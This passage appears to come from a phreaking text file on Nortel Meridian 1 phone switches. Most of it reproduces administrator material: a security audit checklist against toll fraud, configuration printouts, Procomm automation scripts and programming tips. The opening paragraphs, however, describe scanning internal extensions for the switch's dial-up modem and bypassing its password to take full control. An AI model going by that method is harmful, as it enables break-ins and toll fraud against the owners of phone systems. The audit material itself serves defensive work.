o 100% control over every single inbound/outbound trunk group
o Access to every single voicemail box on the switch
o Access to trunk/group/node administration

Basically, the meridian administration module is designed to make the admin
(or whoever has access to it) GOD over the entire system, I say GOD because
you could do anything you wanted, as far as your telephony derived
imagination extends. OK, enough of this.. I'm just going to stop going on
about what if's for the time being, now I'm going to concentrate on the
factual based information, and how one would go about accessing such a
switch.

The simpilist way to find the internal dialup to a meridian switch is to
scan the internal extensions which the switch controls. It's generaly a
good idea to begin scanning network/node extensions such as 00,01,02,03[xx]
etc. What you are looking for is a modem carrier, which when you connect
should ask you for a singular password, which in most cases is bypassed
by hitting control-SD. Once you are in, you should recieve the switches
command line prompt, somthing similar to this:

>

or

SWITCH0>

OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in
a funny kind of way. Meridian switches are designed to emualte certain levels
of DMS-100 O/S types, so you'll find that many of the BCS leveled commands
that you know from DMS will be usefull here. The information that follows
has been obtained from public Meridian Mail Administration sources on the
net..

/*

Basic Meridian 1 Security Audit
-------------------------------

"Users will go nuts calling a radio station to win a free toaster,
taking over all the trunks in your phone system."

An audit of the Meridian 1 telephone system will ensure that every possible
"system" precaution has been made to prevent fraud. The first step involves
querying data from the system in the form of printouts (or "capturing" the
data to a file in a PC). The next step is to analyze the data and confirm the
reason for each entry. Please be advised that this procedure is not designed
for all "networked" Meridian 1 systems, however, most of the items apply to
all systems. Use at your own risk.

PRINTOUTS REQUIRED FOR SECURITY AUDIT: It is suggested that you "capture" all
of the data from these printouts to separate files. This can be accomplished
with a PC and communications program. For the BARS LD90 NET printout, try
this file. (enclosed in faith10.zip barparse.zip)

------------------------------------------------------------------------------
LD22

  
CFN LD22 PWD LD21 CDB LD21 RDB
LD21 LTM LD23 ACD LD24 DISA LD20 SCL
LD86 ESN LD86 RLB LD86 DMI LD87 NCTL
LD87 FCAS LD87 CDP LD90 NET LD90 SUM
LD20 TNB LD22 DNB LD88 AUB
------------------------------------------------------------------------------

GATHERING DATA FROM LD81
------------------------
List (LST) the following FEAT entries to form an information base on the
telephones.

------------------------------------------------------------------------------
NCOS 00 99 CFXA UNR TLD SRE
FRE FR1 FR2 CUN CTD
------------------------------------------------------------------------------

DATA BLOCK REVIEW ITEMS
-----------------------
From the printouts, a review of the following areas must be made. Some of the
items may or may not be appropriate depending on the applications of the
telephone system.


------------------------------------------------------------------------------
CFN - Configuration Verify that History File is in use.
------------------------------------------------------------------------------
PWD - Passwords Verify that FLTH (failed login attempt threshold) is
low enough. Verify that PWD1 and PWD2 (passwords) use
both alpha and numeric characters and are eight or
more characters long. Note any LAPW's (limited access
passwords) assigned. Enable audit trails.
------------------------------------------------------------------------------
CDB - Customer Verify that CFTA (call forward to trunk access code)
Data Block is set to NO. Verify NCOS level of console. Verify
that NIT1 through NIT4 (or other night numbers) are
pointing to valid numbers. EXTT prompt should be NO
to work in conjunction with trunk route disconnect
controls (See RDB)
------------------------------------------------------------------------------
RDB - Trunk Route Verify that every route has a TARG assigned. Confirm
Data Block that FEDC and NEDC are set correctly. ETH is typical,
however for maximum security in blocking trunk to
trunk connections, set NEDC to ORG and FEDC to JNT
Confirm that ACCD's are a minimum of four digits long
(unless for paging). If ESN signaling is active on
trunk routes, verify that it needs to be. ESN
signaling, if not required, should be avoided. NOTES
ON TGAR: For demonstration purposes, this document
suggests that sets be a "TGAR 1". The only
requirement for TGAR is that it match one of the TARG
numbers assigned in the Route Data Block
------------------------------------------------------------------------------
ACD - Automatic Verify ACD queues and associated NCFW numbers.
Call Distrobution Verify all referenced extensions.
------------------------------------------------------------------------------
DISA - Direct Remove DISA if not required. If required, verify that
Inward System security codes are in use.
Access
------------------------------------------------------------------------------
ESN - Electronic AC1 is typically "9". If there is an AC2 assigned,
Switched Network verify its use. If TOD or ETOD is used - verify what
NCOS levels are changed, when they are changed and
why they are changed. Apply FLEN to your SPNs to
insure nobody is ever allowed to be transferred to a
partially dialed number, like "Transfer me to 91800"
Study EQAR (Equal Access Restriction) to insure that
users can only follow a "Carrier Access Code" with a
zero rather than a one: (1010321-1-414-555-1212 is
blocked but 1010321-0-414-555-1212 is allowed with
EQAR)
------------------------------------------------------------------------------
NCTL - Network Use LD81 FEAT PRINT to verify all NCOS being used.
Control Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X
in the NCTL? Does FRL 0 have any capabilities? - It
should not be able to dial anything.
------------------------------------------------------------------------------
FCAS - Free Call Confirm the need to use FCAS and remove it if
Screening possible. FCAS is usually a waste of system memory
and complicates the system without saving money.
------------------------------------------------------------------------------
DGT (DMI) - Digit Confirm all numbers referenced in the "insert"
Manipulation section of each DMI table.
------------------------------------------------------------------------------
RLB - BARS Route Are any RLB ENTR'S assigned FRL 0 - typically, only
List Block the RLB that handles 911 calls should have an FRL 0.
If DMI is in use, confirm all "inserted" numbers.
------------------------------------------------------------------------------
CDP - BARS Are all CDP numbers valid? Check the RLBs they point
Coordinated to and see what the DMI value is. Confirm insertions.
Dialing Plan
------------------------------------------------------------------------------
NET - ALL - BARS Add 000,001,002,003,004,005,006,007,008,009 as SPNs
Network Numbers pointing to a route list block that is set to LTER
YES. These entries block transfers to "ext. 9000" and
similar numbers. Point SPN "0" to a RLI with a high
FRL, then consider adding new SPNs of 02, 03, 04, 05,
06, 07, 08, 09 to point to a RLI with a lower FRL so
that users cannot dial "0", but can dial "0+NPA
credit card calls. Check FRL of 0, 00, 011 and
confirm that each is pointed to separate NET entry
requiring a high FRL. Remove all of shore NPAs (Like
1-809 Dominican Republic) if possible. Regulations
are almost non-existent in some of those areas and
they are hot fraud targets. Verify blocking 900 and
976 access. Also consider blocking the NXX of your
local radio station contest lines. Users will go nuts
calling a radio station to win a free toaster, taking
over all the trunks in your phone system. Restrict
the main numbers and DID range within the BARS
system. There is no need to call from an outgoing to
an incoming line at the same location.
------------------------------------------------------------------------------
TRUNKS Confirm that all trunks have TGAR assigned. Confirm
that all incoming and TIE trunks have class of
service SRE assigned. (caution on networked systems)
Confirm that all trunks have an NCOS of zero.
NOTES ON TGAR: For demonstration purposes, this
document suggests that sets be a "
TGAR 1". The only
requirement for TGAR is that it match one of the TARG
numbers assigned in the Route Data Block
------------------------------------------------------------------------------
SETS-PHONES Does every phone have a TGAR of 1 assigned? (This
must be checked set by set, TN by TN). Can you change
every phone that is UNR to CTD? Review LD81 FEAT
PRINT to find out the UNR sets. CTD class of service
is explained below. Confirm that all sets are
assigned CLS CFXD? Confirm that the NCOS is
appropriate on each set. In Release 20 or above,
removing transfer feature may be appropriate. Confirm
that all sets CFW digit length is set to the system
DN length. NOTES ON TGAR: For demonstration purposes,
this document suggests that sets be a "
TGAR 1". The
only requirement for TGAR is that it match one of the
TARG numbers assigned in the Route Data Block Apply
Flexible Trunk to Trunk Connections on the set, and
FTOP in the CDB if deemed appropriate. These
restrictions are done on a set by set basis and allow
or deny the ability to transfer incoming calls out of
the facility.
------------------------------------------------------------------------------
VOICE MAIL PORTS Each port should be CLS of SRE Each port should be
NCOS 0 - NCOS 0 must be known to be too low to pass
any call Each port should be TGAR 1 (all trunk routes
must be TARG 1 also) NOTES ON TGAR: For demonstration
purposes, this document suggests that sets be a
"
TGAR 1". The only requirement for TGAR is that it
match one of the TARG numbers assigned in the Route
Data Block NOTE: If you are used to your Mail system
doing outcalling, you can forget about that working
after applying these restrictions.
------------------------------------------------------------------------------

CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS:
-----------------------------------------------------
EXPLANATION OF CLASS OF SERVICE SRE:
------------------------------------
NTP DEFINITION: Allowed to receive calls from the exchange network.
Restricted from all dial access to the exchange network. Allowed to access
the exchange network through an attendant or an unrestricted telephone only.
Essentially, an SRE set can do nothing on it's own except dial internal and
TIE line extensions. If a trunk is SRE - it will work normally and allow
conference calls and transfers.

EXAMPLES OF 'SRE' IN USE:
-------------------------
Voice Mail cannot connect to an outgoing line, but can receive incoming
calls. Callers on the far end of a TIE line cannot call out through your end
(for their sake, both ends should be SRE).

EXPLANATION OF CLASS OF SERVICE CTD:
------------------------------------
If a route access code is accessed (if there was no match between the TGAR
and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller
makes a "
dial 9" BARS call, the NCOS will control the call.

EXPLANATION OF TGAR AND TARG:
-----------------------------
The best restriction is to have all trunk routes TARG'd to 1 and all TNs
(including actual trunk TNs) TGAR'd to 1. This will block all access to
direct trunk route selection.

BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS
----------------------------------------------------
No incoming caller will have access to an outside line unless physically
transferred or conferenced by an internal party. If voice mail ports are SRE
and NCOS 0 and have a TGAR matching the TARG - they will not be able to
transfer a call out of the system, regardless of the voice mail system's
resident restrictions assigned. No phone will be able to dial a trunk route
access code. Consider allowing telecom staff this ability for testing.

Layered security:
-----------------
If in phone programming, TGAR was overlooked on a phone, the CTD class of
service would block the user from dialing a 0 or 1 if they stumble upon a
route access code. If in programming, the CTD class of service was
overlooked, both TGAR and NCOS would maintain the restrictions. If in
programming, the NCOS is overlooked, it will defaults to zero, which is
totally restricted if NCTL and RLBs are set up correctly.


Quick Tour of a Simple Meridian 1 BARS Call
-------------------------------------------
Basic Automatic Route Selection. If you dial "
9", you are accessing BARS.
"
9" is the "BARS Access Code"

1. A telephone dials "
9" - BARS activates.
2. The telephone calls a number - Example: 1-312-XXX-XXXX
3. The PBX hold the digits while it looks up "
1-312" to figure out what
Route List to use for processing the call.
4. The Route List determines the possible trunk routes that can be used.
5. The Route List checks the facility restriction level of the telephone
and compares it to its own required facility restriction level.
6. The Route List checks to see if any special digit manipulation should
be performed.

LD90 NET
--------
The LD90 Network overlay is where area codes and exchanges are defined. If a
prefix is not entered into LD90, it cannot be dialed through BARS. Each area
code or exchange refers to a "
Route List" or RLI which contains the
instructions for routing the call.

>ld 90
ESN000

REQ prt
CUST 0
FEAT net
TRAN ac1
TYPE npa

NPA 1312

NPA 1312 <-- This is the network number (prefix)
RLI 11 <-- This is the Route List that the prefix gets instruction from
DENY 976 <-- This is an exchange in NPA 312 that is blocked

SDRR DENY CODES = 1
DMI 0
ITEI NONE

REQ end


LD86 RLB (or RLI)
-----------------
The RLB is a "
list" of possible trunk routes that an area code or exchange
can be dialed over. Each "
ENTR" or list entry contains a trunk route. Each
entry also has a "
minimum Facility Restriction Level" or "FRL" that must be
met before a phone can access that entry. In the following example, the first
entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The
second entry can only be accessed by phones whose NCOS equals an FRL of 6 or
above. Along with the trunk route and the FRL, you can apply specific "
digit
manipulation" with the DMI entry. The DMI entries are explained here.

>ld 86
ESN000

REQ prt
CUST 0
FEAT rlb
RLI 11

RLI 11
ENTR 0 <-- This is the list's first "
Entry Number"
LTER NO
ROUT 15 <-- This is the first choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON
4 ON 5 ON 6 ON 7 ON
CNV NO
EXP NO
FRL 3 <-- This is the Facility Restriction Level
DMI 10 <-- This is the Digit Manipulation Index Number
FCI 0
FSNI 0
OHQ YES
CBQ YES

ENTR 1 <-- This is the list's second "
Entry Number"
LTER NO
ROUT 9 <-- This is the second choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON
4 ON 5 ON 6 ON 7 ON
CNV NO
EXP YES <-- This is considered the "
expensive" choice
FRL 6 <-- Note that the Facility Restriction Level is higher
DMI 0 <-- Note no digit manipulation is required for this trunk
route
FCI 0
FSNI 0
OHQ YES
CBQ YES

ISET 2
MFRL 3

REQ end


LD87 NCTL
---------
The FRL to NCOS "
relationship" is built in the NCTL data block. The FRL and
the NCOS do not necessarily have the equal one another, however they usually
do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS
number to have any capability, it must first be defined in the NCTL data
block.

>ld 87
ESN000

REQ prt
CUST 0
FEAT nctl
NRNG 0 7 <-- Range from NCOS 0 through 7 was requested

SOHQ NO
SCBQ YES
CBTL 10
---------------
NCOS 0

EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 1

EQA NO
FRL 1
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 2

EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 3

EQA NO
FRL 3 <-- NCOS 3 equals FRL 3.
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 4

EQA NO
FRL 4
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 5

EQA NO
FRL 5
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 6

EQA NO
FRL 6 <-- NCOS 6 equals FRL 6.
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 7

EQA NO
FRL 7
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0

TOHQ NONE


LD86 Digit Manipulation
-----------------------
The Digit Manipulation data blocks are where special prefixes are entered
before numbers are sent out over trunks. An example of digit manipulation is
where a 1010XXX carrier access code must be inserted before a number is
processed over a trunk.

REQ prt
CUST 0
FEAT dgt
DMI 10

DMI 10 <-- This is simply the index number.
DEL 1 <-- This says "
delete the first digit after "9"
CTYP NCHG

REQ prt
CUST 0
FEAT dgt
DMI 3

DMI 3
DEL 0 <-- This says "delete nothing after 9"
INST 101288 <-- This says "Insert 101288 after 9 and before the actual number
dialed"

CTYP NCHG

REQ end


Telephone
---------
This is simply a telephone's data block

DES 5135
TN 004 0 14 00
TYPE 500
CDEN 4D
CUST 0
DN 5135 MARP
CPND
NAME Typical User
XPLN 9
DISPLAY_FMT FIRST,LAST
AST NO
IAPG 0
HUNT
TGAR 1
LDN NO
NCOS 5 <-- What FRL does this equal?
SGRP 0
RNPG 0
LNRS 16
XLST
SCI 0
CLS CTD DTN FBD XFA WTA THFD FND HTD ONS
LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD
CFTD SFD C6D PDN CNID CLBD AUTU
ICDD CDMD EHTD MCTD
GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD
MBXD CPFA CPTA DDGA NAMA
SHL ABDD CFHD
USRD BNRD OCBD
RCO 0
PLEV 02
FTR CFW 4
DATE 28 NOV 1978


LD86 ESN - the Start of BARS
----------------------------

The ESN data block is the root of BARS. Before BARS can be set up, the ESN
data block must be defined.

>ld 86
ESN000

REQ prt
CUST 0
FEAT esn

MXLC 0
MXSD 30
MXIX 0
MXDM 100
MXRL 80
MXFC 60
MXFS 0
MXSC 120
NCDP 4
AC1 9 <-- This is where "9" is defined
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 00 00 23 59 <-- This section refers only to time of day
routing controls
RTCL DIS
NCOS 0 - 0 <-- This section refers only to time of day routing
controls
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 3
NCOS 4 - 4
NCOS 5 - 5
NCOS 6 - 6
NCOS 7 - 7
<continued to 99...>
NCOS 99 - 99
ETOD
TGAR NO

REQ end


ISLUA 99 Session BA 20
Capturing Data From Your Meridian 1
to Various PC Software Packages
Curt Kempf City of Columbia, Missouri
Thanks for attending the workshop
I hope you find this information helpful
========================================

o ACD Daily Report

o Procomm Plus Script to
capture ACD reports to
disk. Format: MMDDYY.TXT

o TN PRT out of Host MCA card

o Procomm Script to CHG a TN
when it becomes IDLE

o Procomm Script to CHG/NEW
a list of DNs and their
NAMES (LD 95)

o Procomm Script to monitor
PBX for "DTA0021", "INI0",
"PWR01", then send an
alpha numeric page when
received.


ACD Daily Report
================
ACD 000 1999 03 29 17:00
DAILY TOTALS REPORT


REPT 1
ACD AVG CALLS AVG AVG AVG AVG DN AVG #-XFER AVG-TIME-POSN
DN AGTS ANSWD ASA DCP PCP WORK WAIT CALLS TIME IDN ACD BUSY MANNED
7380 324 54 125 388 514 127 118 69 0 28 22085 27246
------------------------------------------------------------------------------
1 324 54 125 388 514 127 118 69 0 28 22085 27246

REPT 2
ACD CALLS RECALL ANSWERED ABANDONED TOF TOF OVER INTER
DN ACCPTED TO LONGEST NO. AVG.WT TSF IN OUT FLOW FLOW
SOURCE WT. TIME BUSY
7380 366 0 476 43 88 80 0 0 8 0
------------------------------------------------------------------------------
1 366 0 476 43 88 80 0 0 8 0

REPT 4
POS CALLS AVG AVG AVG DN INC DN OUT #-XFER BUSY MANNED
ID ANSWD DCP PCP WAIT INC TIME OUT TIME IDN ACD TIME TIME

ACD DN 7380
301 81 136 115 142 3 66 12 352 0 9 20716 32208
303 57 91 261 139 4 478 15 652 0 4 20788 28702
309 49 90 2 182 0 0 1 100 0 7 4550 13466
304 87 128 127 108 1 60 12 564 0 6 22662 32088
305 39 185 108 73 0 0 2 96 0 1 11464 14302
308 0 ***** ***** ***** 15 1770 20 1464 0 0 32256 32400
306 0 ***** ***** ***** 9 2950 13 1660 0 0 32400 32400
312 11 145 2686 50 4 286 7 416 0 1 31848 32400
------------------------------------------------------------------------
8 324 125 388 127 36 93 82 88 0 28 2945 3633


Procomm Plus Script to capture ACD
reports to disk. Format: MMDDYY.TXT
====================================

; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested
; with ProComm Plus 32 95/NT, version 4. Script to caputure ACD reports to
; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script
; waits for "ACD DN 7380" to occur, which is on every hourly report, then
; closes and appends the newest statistics to MMDDYY.TXT file.

string cmd="ncopy c:\capture\"
string szFileName = $DATE
string szDate = $DATE
integer Pos = 0

proc main
dial data "Option 61"
set capture overwrite OFF ; if capture file exists, append data to it.
capture off ; close capture file if it is open
when TARGET 0 "ACD DN 7380" call CLOSECAP

Startloop:
clear ; clear contents of screen and scroll back buffer
szFileName = $DATE
szDate = $DATE
while 1
if nullstr szFileName ; Check to see if we've reached
exitwhile ; the end of source string
endif ; and if so, exit loop.
if strfind szFileName "/" Pos ; Check for char
strdelete szFileName Pos 1 ; and delete it
else
exitwhile ; exit if no more characters
endif
endwhile

strcat szFileName ".txt"
set capture file szFileName ; Set name of capture file.
capture on ; Open up the capture file.
while strcmp $DATE szDate ; Loop while date is the same
endwhile ; or if the date changes,
capture off ; Close the capture file.
goto Startloop ; and start a new one.
endproc

proc closecap
pause 3
strcat cmd szFileName ; Append to variable "CMD"
strcat cmd " h:\uab\" ; Append network drive to "CMD"
transmit "^M***********^M" ; Put in asteriks between hourly reports
capture off ; Close capture file
pause 5
DOS cmd HIDDEN i0 ; Run "CMD" in DOS and copy file to the LAN
pause 10
taskexit i0 ; Exit DOS window
pause 10
cmd="ncopy c:\capture\" ; Reset "CMD"
capture on ; Turn Capture back on.
Endproc


Procomm Screen of dialing up the host
MCA card(direct connect 9600 baud)
=====================================

ENTER NUMBER OR H (FOR HELP): 2206

CALLING 2206
RINGING
ANSWERED
CALL CONNECTED. SESSION STARTS
logi
PASS?
TTY #02 LOGGED IN 08:59 11/4/1999
>

TN PRT out of Host MCA card

DES 2206
TN 020 0 04 31 ;note TN is TN of voice set(20 0 4 15) +(plus) 16
TYPE 2616
CDEN 8D
CUST 0
AOM 0
FDN
TGAR 1
LDN NO
NCOS 2
SGRP 0
RNPG 0
SCI 0
SSU
XLST
SCPW
CLS CTD FBD WTD LPR MTD FND HTD ADD HFD
MWD AAD IMD XHD IRD NID OLD DTA DRG1
POD DSX VMD CMSD CCSD SWD LND CNDD
CFTD SFD DDV CNID CDCA
ICDD CDMD MCTD CLBD AUTU
GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD
CPFA CPTA ABDD CFHD FICD NAID
DDGA NAMA
USRD ULAD RTDD PGND OCBD FLXD FTTU
TOV 0 MINS
DTAO MCA
PSEL DMDM
HUNT
PSDS NO
TRAN ASYN
PAR SPACE
DTR OFF
DUP FULL
HOT OFF
AUT ON
BAUD 9600
DCD ON
PRM HOST ON
VLL OFF
MOD YES
INT OFF
CLK OFF
KBD ON
RTS ON
PLEV 02
AST
IAPG 0
AACS NO
ITNA NO
DGRP
DNDR 0
KEY 00 SCR 2206 0 MARP
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
DATE 30 DEC 1997

Very rarely, I can not dial up the host MCA card. It simply won't answer, so
the following usually clears it up:

ITEM
ITEM OPE YES
DCD ON
PRM OFF

If that doesn't work, since 020 0 04 31 is "digital", it could be disabled.

LD 32 and ENLU it.

Procomm Script to CHG a TN when it becomes IDLE
===============================================

string TN ;TN
string TIPE ;TYPE, however word is reserved in ASPECT
string EYETEM ;ITEM, ditto above.
string szList ;List of items.
string szItem ;Item selected from list.
integer Event ;Dialog box event.
integer Num ;integer value
proc MAIN
set txpace 50 ;delay for keyboard
when TARGET 0 "IDLE" call CHGIT ;when receive IDLE, go change set.
;Input the TN, TYPE, and ITEM
sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN
if strcmp TN "" ; compare to see if NULL?
halt ;if enter is pressed, halt script.
else
endif

; Display dialog box with list of items.
; Pick if set is a 500, 2008, or 2616
szList = "2616,2008,500"
dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)"
listbox 1 5 5 90 40 szList single szItem
pushbutton 2 28 52 40 14 "&Exit" ok default
enddialog

while 1
dlgevent 0 Event ; Get the dialog event.
switch Event ; Evaluate the event.
case 0 ; No event occurred.
endcase
case 1
if strcmp szItem "2616"
tipe = "2616"
else
if strcmp szItem "2008"
tipe = "2008"
else
if strcmp szItem "500"
tipe = "500"
endif
endif
endif

endcase
default ; Exit case chosen.
exitwhile
endcase
endswitch
endwhile

dlgdestroy 0 CANCEL ; Destroy the dialog box.

sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM
Transmit "LD 11^M" ;Go in to overlay 11
Waitfor "REQ"

for Num = 0 upto 100 ;Keep STAT'n til IDLE
Transmit "STAT "
Transmit TN
Transmit "^M"
pause 10 ; wait 10 seconds
endfor

endproc

PROC CHGIT

Transmit "CHG^M" ;Go change the set, then halt the script.

Waitfor "TYPE"
Transmit TIPE
pause 1 ;pause 1 second
Transmit "^M"

Waitfor "TN"
Transmit TN
Transmit "^M"

Waitfor "ECHG"
Transmit "YES^M"

Waitfor "ITEM"
Transmit EYETEM
Transmit "^M"
waitfor "ITEM"
transmit "^M"

Waitfor "REQ:"
Transmit "END^M"

halt
endproc


Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
===============================================================

integer flag=0 ;set flag

proc main
set txpace 100 ;delay for keyboard
when TARGET 1 "SCH2115" call LD95NEW ;wait for 'name does not exit' error
;open text file that has a list of
;DNs & NAMEs you want to change/add.
fopen 1 "C:\phone\chgnames.txt" READ
;chgnames.txt it in the format of
; 7354, Jane Doe
; 6745, John Smith
; 7645, Dan White
;script doesn't care if the NAME is NEW or CHG J
if failure
usermsg "could not open the file."
else
Transmit "LD 95^M" ;Go in to overlay 95
Waitfor "REQ"
Transmit "CHG^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
Transmit "^M"
fseek 1 0 0
while 1
fgets 1 s0
if FEOF 1
exitwhile
endif
strtok s1 s0 "," 1
strtok s2 s0 "," 1
DelStr (&s1)
DelStr (&s2)
DelLineFeed (&s2)
;strfmt s4 "TN: %s" s1 ;uncomment these two for
;usermsg s4 ;troubleshooting the script
strlen s1 i0
if (i0 > 2)
LD95CHG ()
else
Transmit "****^M"
halt
endif
endwhile
endif
endproc

proc LD95CHG
Waitfor "DN"
Transmit s1
Transmit "^M"
pause 1

if FLAG==1
FLAG=0
Transmit "^M"
return
else
Transmit s2
Transmit "^M"
Waitfor "DISPLAY_FMT"
endif
endproc

proc LD95NEW
FLAG=1
Transmit "^M"
Transmit "**^M"
Waitfor "REQ"
Transmit "NEW^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
Transmit "^M"
Waitfor "DN"
Transmit s1
Transmit "^M"
Waitfor "NAME"
Transmit s2
Transmit "^M"
Waitfor "DISPLAY_FMT"
Transmit "^M"
Waitfor "DN"
Transmit "^M"
Waitfor "REQ"
Transmit "CHG^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
endproc

proc DelStr
param string szStr
integer Pos
while 1
if StrFind szStr "`"" Pos
StrDelete szStr Pos 1
else
exitwhile
endif
endwhile
endproc

PROC DelLineFeed
param string szStr
integer Pos
strlen szStr Pos
if (Pos > 2)
StrDelete szStr (Pos-1) 1
endif
endproc



You could very easily modify this script to say, change an ASCII list of TNs
/TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables
would change from DN & NAME, to TN & TYPE, and add Waituntil "
2:00:00" "7/16
/99" to kick it off at 2:00 a.m.

Procomm Script to monitor PBX for "
DTA0021", "INI0", "PWR01", then send
an alph numeric page when received.
=======================================================================

proc Main
#DEFINE pagernum "
235.5334" ;Enter your pager number here.
string szName="
OPT61.cap" ;Name of text file to capture to.
string passw
when TARGET 1 "
DTA021" call DTA021 ;what do you want to 'wait for' ?
when TARGET 2 "
INI0" call INI0
when TARGET 3 "
PWR01" call PWR0

set capture file szName
capture on
set txpace 150 ;delay for keyboard
HANGUP
Dial DATA "
MCA"
transmit "
^M"
waitfor "
HELP):"
transmit "
2206^M"
waitfor "
SESSION STARTS"
while $CARRIER
transmit "
****"
pause 1
transmit "
LOGI^M"
waitfor "
PASS?"
sdlginput "
Security" "Password: (all caps!)" passw MASKED
if stricmp passw "
sss" ;to bypass logging in.
transmit "
*"
call loggedin
endif
transmit passw
transmit "
^M"
pause 2
endwhile
set txpace 1
endproc

proc DTA021
pageA() ;dial paging provider
TRANSMIT "
Digital Trunk Diagnostic. Frame alignment persisted for
3 seconds^M" ;send specific x11 error to pager
pageB() ;end connection to provider
mcacard() ;connect back to Option 61
endproc

proc INI0
pageA()
TRANSMIT "
An initialization has taken place.^M"
pageB()
mcacard()
endproc
proc PWR0
pageA()
TRANSMIT "
Power failure from power and system monitor.^M"
pageB()
mcacard()
endproc

proc mcacard
HANGUP
PAUSE 2
Dial DATA "
MCA" ;Connect up to option 61 through MCA card.
while $DIALING
endwhile
transmit "
^M"
pause 1
transmit "
^M"
waitfor "
HELP):"
transmit "
2206^M"
waitfor "
SESSION STARTS"
pause 1
when RESUME
call loggedin
loggedin()
endproc

proc loggedin
while $CARRIER ;wait for errors to occur. Continue to do your MACs etc..
endwhile
endproc

proc pageA
when SUSPEND
set port dropdtr on
pause 1
hangup ;hangup Option 61 connection
pause 2
hangup ;release mca card from COM port
set port dropdtr off
pause 1
Dial DATA "
TriStar" ;Dial your paging provider
while $DIALING
endwhile
TRANSMIT "
^M" ;TAPI protocol, M puts in manual mode.
WAITFOR "
ID="
TRANSMIT "
M^M"
WAITFOR "
Enter pager"
TRANSMIT pagernum
TRANSMIT "
^M"
WAITFOR "
Enter alpha"
endproc

proc pageB
TRANSMIT "
^M"
WAITFOR "
More Pag"
TRANSMIT "
^M"
pause 2
endproc


Little Known Meridian 1 Features And Programming Tricks
=======================================================
HELP and Error Lookup

HELP - Type "
? " at many prompts
LOOKUP - At "
> " sign, type
ERR AUD028 to find out what AUD028 indicates.
At any other prompt, type "
! ", then you will receive " > "
symbol for getting ERR lookup.

Find Sets with a Certain Feature
================================
LD81
REQ LST
FEAT CFXA
FEAT UNR

Lists all sets that have the "
Call Forward External Allow"
feature, then lists all UNR sets.

Inventory and Identification Commands
=====================================
LD32
IDU l s c u (or) IDC l s c
LD22
CINV (and) ISSP
LD30
UNTT l s c u

Speed Call Stuff
================
Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists.
When memory is plentiful, make Speed Call list number the same as the persons
DN. Need to increase MSCL in LD17 Find a "
Controller" in LD81 by: REQ:LST,
FEAT:SCC, then the Speed List Number

Allow Restricted Sets to Dial Certain Long Distance Numbers.
============================================================
Add the numbers to a System Speed Call List. Assign an NCOS to the "
List"
that replaces the users NCOS during the call. Alternate: Add the suffix of
the telephone number to an ARRN list in the prefixes RLI. This will point
only that number to a new RLI with a lower (or higher if you choose) FRL.
Look up ARRN in LD86

PBX Clock Fast or Slow?
=======================
LD2
SDTA X Y -- x y
X = 0 for "
subtract time each day" -or- 1 for "add time each day"
Y = 0-60 seconds to be added or subtracted each day.
Daylight Savings Question?
TDST Look this one up in LD2 before changing

Phantom DNs, TNs, and "
MARP to Voice Mail" TNs
==============================================
Phantom TN with FTR DCFW ACD Queues with NCFW but no Agents 2616 Sets with
AOMs (AOMs can be in "
software", but do not need to be "installed" on the
set). This is an excellent "
MARP TN" for DNs that need to HUNT/FDN to Voice
Mail

Digit Display on Trunk Routes and ACD Queues
============================================
Find Trunk Route Access Codes - name in LD95 like any other DN ACD Numbers -
name in LD95 like any other DN IDC Numbers - name in LD95 at DCNO prompt.

Limited Access Passwords
========================
Print PWD in LD22 before starting
LD17
LAPW 01
PW01 12345
OVLA 10 11 20

Identify Trunks, Routes and TTY Ports with "
DES" Entry
======================================================
LD17 ADAN
DES can be 1-16 characters
LD16 RDB
DES can be 1-16 characters
LD14 TRK
DES can be 1-16 characters
TKID - enter telephone number

Free Up or Block DN Range
=========================
Change your SPRE Code to 4 digits LD15 - SPRE XXXX Assign all current feature
codes as Flexible Feature Codes To hide DNs from appearing in LUDN printouts,
